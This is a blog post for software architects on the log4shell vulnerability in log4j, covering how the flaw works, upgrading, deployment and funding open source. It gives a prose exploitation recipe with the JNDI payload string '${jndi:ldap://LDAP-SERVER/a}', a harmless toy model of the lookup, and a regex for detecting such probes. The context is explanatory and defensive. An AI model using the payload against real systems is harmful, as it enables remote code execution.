This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-44228).

Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination.

What are the key lessons you as a software architect can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would look up a Java class on the LDAP server mentioned, and execute that class.
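To see why merely logging user input was enough, consider a toy model of such a lookup mechanism in Python. This is not log4j's code: `make_toy_logger` and `fake_jndi` are hypothetical names, and the stand-in JNDI handler only records the URL instead of loading anything. In this toy model, the `${...}` expression is expanded after the user-supplied text has already become part of the message, which is exactly what makes the attack possible.

```python
import re

# Matches a single, non-nested "${prefix:value}" lookup expression.
LOOKUP = re.compile(r"\$\{(\w+):([^${}]*)\}")

def make_toy_logger(handlers):
    """Return a log function that expands ${prefix:value} lookups in messages,
    loosely imitating the lookup feature of vulnerable log4j versions."""
    def log(message):
        def expand(match):
            prefix, value = match.group(1), match.group(2)
            handler = handlers.get(prefix)
            # Lookups with an unknown prefix are left untouched.
            return handler(value) if handler else match.group(0)
        return LOOKUP.sub(expand, message)
    return log

fetched = []

def fake_jndi(url):
    # A vulnerable logger would contact the LDAP server and run a class from it;
    # this hypothetical stand-in only records the URL it would have contacted.
    fetched.append(url)
    return "<object from " + url + ">"

log = make_toy_logger({"jndi": fake_jndi})
user_input = "${jndi:ldap://LDAP-SERVER/a}"   # attacker-controlled text
line = log("Login failed for user " + user_input)
print(line)
```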

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

- Create a nasty class that you would like to execute on your target;

- Set up your own LDAP server somewhere that can serve your nasty class;

- "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" wherever possible: in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.
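The same recipe explains why defenders started scanning request data and log files for such strings. Below is a minimal heuristic sketch; `looks_like_log4shell_probe` is a hypothetical helper, it will miss more elaborate obfuscations, and it is no substitute for upgrading.

```python
import re

# Direct form, e.g. "${jndi:ldap://LDAP-SERVER/a}", matched case-insensitively.
DIRECT = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Nested lookups such as "${${lower:j}ndi:...}" were used to dodge naive
# filters, so treat any "${" appearing inside another "${..." as suspicious.
NESTED = re.compile(r"\$\{[^}]*\$\{")

def looks_like_log4shell_probe(text):
    """Heuristic check for JNDI lookup strings in user input or log lines."""
    return bool(DIRECT.search(text) or NESTED.search(text))

for sample in ["${jndi:ldap://LDAP-SERVER/a}", "${${lower:j}ndi:ldap://x/a}",
               "price is $5 {approx}"]:
    print(sample, looks_like_log4shell_probe(sample))
```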

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: if your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system against any new attacks (until the system is restarted).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

- Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;

- Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.

- Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.
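One simple building block for detecting unwarranted changes is to record cryptographic hashes of a deployment's files and later compare the current state against that baseline. The sketch below assumes a deployment is just a directory of files; the helper names `snapshot` and `changed_files` are hypothetical, and in a real setup the baseline should be stored where an intruder cannot rewrite it.

```python
import hashlib
import tempfile
from pathlib import Path

def snapshot(root):
    """Map each file under root (as a relative path) to its SHA-256 digest."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }

def changed_files(baseline, current):
    """Return the files added, removed, or modified since the baseline."""
    added = sorted(current.keys() - baseline.keys())
    removed = sorted(baseline.keys() - current.keys())
    modified = sorted(k for k in baseline.keys() & current.keys()
                      if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}

# Usage: take a baseline, simulate an infection, and compare.
with tempfile.TemporaryDirectory() as deployment:
    Path(deployment, "app.jar").write_bytes(b"v1")
    baseline = snapshot(deployment)
    Path(deployment, "app.jar").write_bytes(b"tampered")
    Path(deployment, "implant.class").write_bytes(b"...")
    report = changed_files(baseline, snapshot(deployment))
print(report)
```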

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix.

Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, version 2.13 dropped support for Java 7. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have security problems beyond log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.
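When taking inventory of which systems need the upgrade, a small helper can flag log4j 2.x versions in the vulnerable range. This is a sketch under stated assumptions: it encodes only the 2.0-2.14.1 range mentioned above, and it ignores suffixes such as `-beta9`, so a pre-release is treated like the corresponding release. The names `parse_version` and `affected_by_log4shell` are hypothetical.

```python
import re

def parse_version(version):
    """Turn '2.14.1' or '2.0-beta9' into a tuple of its leading numeric parts."""
    core = re.match(r"\d+(?:\.\d+)*", version)
    if core is None:
        raise ValueError("unrecognised version: " + version)
    return tuple(int(part) for part in core.group(0).split("."))

def affected_by_log4shell(version):
    """True if the version falls within the 2.0-2.14.1 range."""
    parsed = parse_version(version)
    # Pad to three components so that (2, 0) compares like (2, 0, 0).
    parsed = parsed + (0,) * (3 - len(parsed))
    return (2, 0, 0) <= parsed[:3] <= (2, 14, 1)

for v in ["1.2.17", "2.0-beta9", "2.13.3", "2.14.1", "2.15.0"]:
    print(v, affected_by_log4shell(v))
```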

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache Solr, Neo4j, Elasticsearch, or Apache Struts: see the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Spring, and Hibernate took over two weeks of work.
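Finding out whether log4j reaches you through another library means tracing paths in your dependency graph; build tools can print that graph, for instance `mvn dependency:tree` for Maven or `gradle dependencies` for Gradle. The sketch below assumes the graph has already been extracted into a dictionary and contains no cycles; the artifact names and the helper `paths_to` are made up for illustration.

```python
def paths_to(graph, root, target):
    """Return every dependency path from root to target in an acyclic graph.

    graph maps each artifact name to the list of artifacts it depends on."""
    if root == target:
        return [[root]]
    paths = []
    for dep in graph.get(root, []):
        for path in paths_to(graph, dep, target):
            paths.append([root] + path)
    return paths

# Hypothetical dependency graph; real data would come from your build tool.
graph = {
    "my-service": ["web-framework", "search-client", "json-lib"],
    "web-framework": ["logging-facade"],
    "search-client": ["log4j-core"],
    "logging-facade": ["log4j-core"],
}
for path in paths_to(graph, "my-service", "log4j-core"):
    print(" -> ".join(path))
```

Every printed path points at a direct dependency that has to be upgraded (or patched) before log4j itself is fixed in your system.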



All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.
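Dependency hygiene is easier to sustain when checking for outdated dependencies is automated; tools such as Dependabot or the Versions Maven Plugin do this for real projects. As a minimal illustration of the idea, the hypothetical `outdated` helper below compares declared versions with the latest known ones, assuming purely numeric dotted versions with the same number of components.

```python
def as_tuple(version):
    """'2.14.1' -> (2, 14, 1); assumes purely numeric dotted versions."""
    return tuple(int(part) for part in version.split("."))

def outdated(declared, latest):
    """List (name, declared, latest) for dependencies behind their latest release."""
    report = []
    for name, version in sorted(declared.items()):
        newest = latest.get(name)
        if newest is not None and as_tuple(version) < as_tuple(newest):
            report.append((name, version, newest))
    return report

# Hypothetical versions; in practice these come from your build file and repository.
declared = {"log4j-core": "2.14.1", "json-lib": "3.1.0", "web-framework": "5.2.9"}
latest = {"log4j-core": "2.15.0", "json-lib": "3.1.0", "web-framework": "5.3.13"}
for name, have, newest in outdated(declared, latest):
    print(f"{name}: {have} -> {newest}")
```

Running such a check on every build keeps the upgrade pain small and continuous, rather than concentrated in an emergency.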

Deploying the Fix



Deploying the fix yourself should be simple: with an adequate continuous deployment infrastructure, it is a matter of pushing a button or reacting to a commit.



If your customers need to install an upgraded version of your system themselves, things may be harder. Here investments in a smooth update process pay off, as well as a disciplined versioning approach that encourages customers to update their system regularly, with as few incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.
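Under semantic versioning, a release whose only change is a patched dependency, with your own API untouched, is a patch release. The hypothetical `bump` helper below sketches the version arithmetic, assuming plain MAJOR.MINOR.PATCH strings without pre-release or build metadata; the release numbers in the usage lines are invented for illustration.

```python
def bump(version, part):
    """Bump a MAJOR.MINOR.PATCH version string according to semantic versioning."""
    major, minor, patch = (int(x) for x in version.split("."))
    if part == "major":
        return f"{major + 1}.0.0"
    if part == "minor":
        return f"{major}.{minor + 1}.0"
    if part == "patch":
        return f"{major}.{minor}.{patch + 1}"
    raise ValueError("part must be 'major', 'minor' or 'patch'")

# Hypothetical release lines: the current 3.x line, plus a backport of the
# same log4j upgrade to the older 2.x line.
print(bump("3.4.2", "patch"))  # 3.4.3
print(bump("2.9.7", "patch"))  # 2.9.8
```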

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it is imperative that you give back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect, your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes both the likelihood of such an event and the impact it would have on the confidentiality, integrity, and availability of that system.

This requires investments in:

- Maintainability: enforcing dependency hygiene and keeping dependencies current at all times, to minimize mean time to repair and maximize availability;

- Deployment security: isolating components where possible and logging access, to safeguard confidentiality and integrity;

- Upgradability: ensuring that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;

- The open source ecosystem: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires you, as an architect, to be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.